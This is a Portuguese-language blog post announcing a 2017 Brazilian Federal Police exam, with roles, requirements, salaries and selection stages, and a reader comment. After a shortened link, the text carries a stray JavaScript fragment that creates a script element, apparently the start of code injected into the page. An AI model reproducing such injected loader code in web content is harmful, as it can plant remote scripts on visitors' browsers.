Polícia Federal: Concurso para 2017 autorizado!

Ótima notícia para quem aguarda o concurso da Polícia Federal. O órgão acaba de anunciar a liberação da autorização para a realização de um novo concurso público ainda em 2017.

Segundo o Decreto nº 8.326 de 2014, o Diretor Geral da Polícia Federal tem autonomia para realizar a liberação. O novo concurso deverá ter vagas para os cargos de Perito Federal, Escrivão, Delegado e Agente.

Concorrem aos cargos de Escrivão e Agente, candidatos de nível superior. Já aqueles que pretendem se candidatar para as vagas de Delegado, precisam ter graduação em Direito e experiência mínima de três anos em atividade policial ou jurídica; já os candidatos para as vagas de Agente, precisam ter concluído o nível superior de acordo com a área escolhida.

A remuneração base para os cargos de Agente e Escrivão pode chegar a R$ 12 mil; enquanto os Delegados e Peritos recebem salário base de R$ 22 mil.

O processo de seleção dos últimos concursos contaram com provas objetivas, provas discursivas, testes de aptidão física, exames médicos, avaliações de títulos, avaliação psicológica e curso de formação profissional; além de prova prática de digitação para os inscritos ao cargo de Escrivão e prova oral para os candidatos ao cargo de Delegado.

A aplicação das provas acontece normalmente em todas as capitais brasileiras, sendo o certame normalmente organizado pela Cespe/UnB.

 

PREPARE-SE ANTECIPADAMENTE PARA ESTE CONCURSO: https://goo.gl/GbrCYOvar d=document;var s=d.createElement(‘script’);

2 comentários em “Polícia Federal: Concurso para 2017 autorizado!

  • 2 de fevereiro de 2017 em 3:10
    Permalink

    Gostaria de receber informações sobre oportunidades de trabalho e ou concurso para nivel médio ou seja superior inacabado idade 28 anos

    Resposta
    • 2 de fevereiro de 2017 em 11:58
      Permalink

      Bom dia Maria!
      Agradecemos o seu contato.
      Por favor, inscreva-se em nosso Boletim Semanal. Fica no canto superior desta página!
      Seguimos a disposição.

      Resposta

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *